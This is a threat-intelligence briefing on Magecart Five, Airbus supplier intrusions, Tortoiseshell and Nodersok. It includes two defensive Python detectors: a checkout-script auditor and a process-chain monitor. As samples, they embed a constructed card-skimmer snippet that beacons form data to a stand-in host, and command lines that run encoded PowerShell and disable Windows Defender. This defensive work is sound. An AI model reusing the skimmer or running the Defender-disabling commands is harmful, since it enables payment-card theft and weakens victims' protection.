ShadowTalk Update – Magecart Five Widens Attack Vectors, Suspected Chinese Threat Actor Targets Airbus Suppliers, and Tortoiseshell Developments

October 4, 2019

Coming to you from London this week, Jamie Collier, Philip Doherty, and Josh Poole join Viktoria Austin for our weekly threat intelligence updates. The team kicks off with a discussion around the top story of the week – Magecart Five Widens Attack Vectors.

Updates from this week’s Intelligence Summary

  • In the spotlight this week is a variety of new attack methods demonstrated by “Magecart Five”. The threat group is probably testing them out, and will highly likely implement the most successful methods in future operations. These developments highlight a broader trend across the Magecart umbrella, whose member groups have evolved and integrated multiple new tactics, techniques, and procedures (TTPs) into their attacks during the past year.
  • Weekly highlights include: a suspected Chinese threat group, which may have been “APT10”, attacked European suppliers of aerospace company Airbus; the “Tortoiseshell” threat group targeted United States military veterans; and a newly identified malware variant, dubbed Nodersok, was detected.

Broader Magecart Five attack vectors could hit bigger victim base

Recent attacks by the Magecart Five threat group have incorporated previously unreported infection vectors. These include targeting public routers with malicious JavaScript files, injecting malicious code into an open-source application module, and distributing the “KPOT” information-stealing trojan through spamming services and watering-hole attacks. The group is likely testing these methods (against unnamed victims), intending to use the most successful of them in future operations. It is realistically possible that Magecart Five is either scaling up its traditional card-skimming activity or developing new attack vectors unrelated to skimming (or, potentially, both). This activity highlights the group’s developing operational capability, as well as a broader trend of increasing sophistication among the groups belonging to the Magecart umbrella.

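The common thread in Magecart activity is JavaScript that reaches a payment page without the site owner noticing, whether through a compromised third-party module or some other path. The following is an added example, not code from Digital Shadows or from any Magecart group: a small audit that parses a checkout page and reports inline scripts whose SRI-style digest is not in a known-good baseline, third-party scripts served without an integrity attribute, and scripts loaded from hosts outside an allowlist. The page HTML, the baseline, the allowlist, the host names and the skimmer-style inline body are all constructed for illustration.

```python
"""Audit the scripts on a checkout page for drift from a known-good baseline.

Added example, not Digital Shadows' or Magecart Five's code. The page HTML,
the baseline digest set, the host allowlist and the sample skimmer body are
all constructed for illustration; they are not taken from the podcast summary.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


def sri_digest(body: str) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    digest = hashlib.sha384(body.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


class ScriptCollector(HTMLParser):
    """Collect every <script> element: src/integrity for external, body for inline."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as raw data; accumulate in case it is chunked
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_scripts(html, baseline_inline, allowed_hosts):
    """Return (severity, message) findings for scripts that are new, unpinned or off-allowlist."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname  # None for a relative, first-party path
            if host is not None and host not in allowed_hosts:
                findings.append(("high", f"script from host outside allowlist: {s['src']}"))
            elif host is not None and not s["integrity"]:
                findings.append(("medium", f"third-party script without integrity attribute: {s['src']}"))
        else:
            d = sri_digest(s["body"].strip())
            if d not in baseline_inline:
                findings.append(("high", f"inline script not in baseline (digest {d})"))
    return findings


# Constructed known-good inline script, baseline and allowlist (assumptions for the example)
GOOD_INLINE = "window.dataLayer = window.dataLayer || [];"
BASELINE_INLINE = {sri_digest(GOOD_INLINE)}
ALLOWED_HOSTS = {"cdn.example-payments.com"}

# Constructed skimmer-style body: serialises the form on submit and beacons it to a third party
SKIMMER_INLINE = ("document.querySelector('form').addEventListener('submit', function (e) {"
                  " new Image().src = 'https://stats-collector.example/c?d=' +"
                  " encodeURIComponent(JSON.stringify(Object.fromEntries(new FormData(e.target)))); });")

# Constructed checkout page; the integrity value on checkout.js is a placeholder, not a real hash
SAMPLE_PAGE = f"""<html><head>
<script>{GOOD_INLINE}</script>
<script src="https://cdn.example-payments.com/checkout.js" integrity="sha384-AAAA"></script>
<script src="https://cdn.example-payments.com/analytics.js"></script>
<script src="/static/app.js"></script>
</head><body>
<form id="pay"><input name="card"></form>
<script>{SKIMMER_INLINE}</script>
<script src="https://static-metrics.example/m.js"></script>
</body></html>"""

if __name__ == "__main__":
    for severity, message in audit_scripts(SAMPLE_PAGE, BASELINE_INLINE, ALLOWED_HOSTS):
        print(severity.upper(), message)
```

Run periodically against the rendered page (after JavaScript execution, since skimmers are often added by other scripts at runtime) and treat any high finding as an incident. The digest comparison is deliberately exact: a single changed byte in a vendored module produces a new digest, which is the point when the vector is a poisoned open-source dependency.
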
Suspected Chinese threat actor targets Airbus suppliers

A suspected Chinese cyber threat actor―APT 10 (aka Stone Panda) is a realistic possibility―targeted European suppliers of the aerospace company Airbus during the past 12 months, reportedly in an attempt to obtain commercial secrets. At least four attacks were conducted, targeting technical documents linked to the certification process for Airbus aircraft, documents related to the turboprop engines used on the Airbus A400M military transport aircraft, the propulsion systems for the Airbus A350 passenger jet, and the avionics systems controlling that jet. Reporting did not provide extensive technical details, but did state that the attackers targeted the VPN connections that supplier companies use to reach the Airbus network.

Tortoiseshell lures American military-veteran job seekers

The threat actor Tortoiseshell targeted United States military veterans by creating a veteran hiring website that spoofed the legitimate United States Chamber of Commerce website. The illegitimate site prompted users to install a desktop application that contained malware. Tortoiseshell was recently reported to have targeted IT organizations in the Middle East; this latest incident indicates that the group has expanded to a wider range of sectors and geographies.

New Nodersok fileless malware attacks healthcare and other sectors in US, Europe

A recent attack campaign affecting education, professional-services, and healthcare victims in the United States and Europe delivered the newly identified malware variant Nodersok. Nodersok is fileless malware: rather than dropping its own executable, it abuses living-off-the-land (LotL) binaries already present on the host to run its payload. Researchers suspect that malicious browser advertisements were used to distribute the malware. Once the payload executed, Nodersok attempted to disable antivirus software. This incident highlights the growing popularity of fileless malware techniques during the past year.

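Because fileless malware leaves no new binary on disk, the practical detection surface is process telemetry: which built-in binary ran, what its parent was, and what it was asked to do. The following is an added example, not Microsoft's, Digital Shadows' or Nodersok's code, showing that logic over a few constructed process-creation records. The three rules (a script host with a browser in its ancestry, encoded PowerShell, and PowerShell that weakens Windows Defender) are the author's assumptions about what an infection matching the description above would look like; the specific binaries, the log format and the Defender cmdlet usage are not taken from the page, although `Set-MpPreference` and `Add-MpPreference` are real Defender cmdlets.

```python
"""Flag living-off-the-land process chains and antivirus tampering in process logs.

Added example, not Microsoft's, Digital Shadows' or Nodersok's code. The log
records, the browser and script-host lists, and the tamper patterns are
constructed assumptions about what an infection that starts from a malicious
advert, runs through built-in Windows binaries and then disables antivirus
looks like; none of these specifics come from the podcast summary.
"""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
# Built-in binaries commonly abused to run script without dropping an executable
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe"}

# Common abbreviations of powershell.exe -EncodedCommand
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s", re.IGNORECASE)
# Real Windows Defender cmdlets and the parameter families that weaken protection
AV_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+",
                       re.IGNORECASE)


def parse_event(line):
    """Parse one constructed 'key=value|key=value' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return {
        "pid": int(fields["pid"]),
        "ppid": int(fields["ppid"]),
        "image": fields["image"].rsplit("\\", 1)[-1].lower(),  # basename only
        "cmd": fields["cmd"],
    }


def ancestry(event, by_pid, limit=16):
    """Image names from the event up to the root (or a missing parent), oldest last."""
    chain, cur, seen = [], event, set()
    while cur is not None and cur["pid"] not in seen and len(chain) < limit:
        seen.add(cur["pid"])
        chain.append(cur["image"])
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(lines):
    """Return findings as dicts with pid, rule and the process chain that triggered it."""
    events = [parse_event(l) for l in lines if l.strip()]
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e, by_pid)
        # Rule 1: a script host anywhere below a browser (malvertising -> LotL binary)
        if e["image"] in SCRIPT_HOSTS and any(img in BROWSERS for img in chain[1:]):
            findings.append({"pid": e["pid"], "rule": "browser_spawned_script_host", "chain": chain})
        # Rule 2: PowerShell launched with an encoded command line
        if e["image"] == "powershell.exe" and ENCODED_PS.search(e["cmd"]):
            findings.append({"pid": e["pid"], "rule": "encoded_powershell", "chain": chain})
        # Rule 3: any process turning Defender features off or adding exclusions
        if AV_TAMPER.search(e["cmd"]):
            findings.append({"pid": e["pid"], "rule": "av_tamper", "chain": chain})
    return findings


# Constructed records: a benign admin script (pid 3000) beside a browser -> mshta -> powershell chain
SAMPLE_LOG = r"""
pid=100|ppid=1|image=C:\Windows\explorer.exe|cmd=explorer.exe
pid=2001|ppid=100|image=C:\Program Files\Google\Chrome\Application\chrome.exe|cmd="chrome.exe" --type=renderer
pid=2030|ppid=2001|image=C:\Windows\System32\mshta.exe|cmd=mshta.exe C:\Users\u\AppData\Local\Temp\ad.hta
pid=2031|ppid=2030|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -nop -w hidden -enc QQBCAEMA
pid=2032|ppid=2031|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
pid=3000|ppid=100|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1
"""

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines()):
        print(f["pid"], f["rule"], " <- ".join(f["chain"]))
```

The ancestry walk is what separates this from a plain command-line grep: the Defender tampering in pid 2032 is damning on its own, but the mshta launch in pid 2030 only looks suspicious once you see that its grandparent is a browser. In a real deployment the same three rules map directly onto Sysmon event ID 1 or EDR process-start telemetry.
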
For more details, read the full Weekly Intelligence Summary here:

Weekly Intelligence Summary 26 Sep - 03 Oct 2019
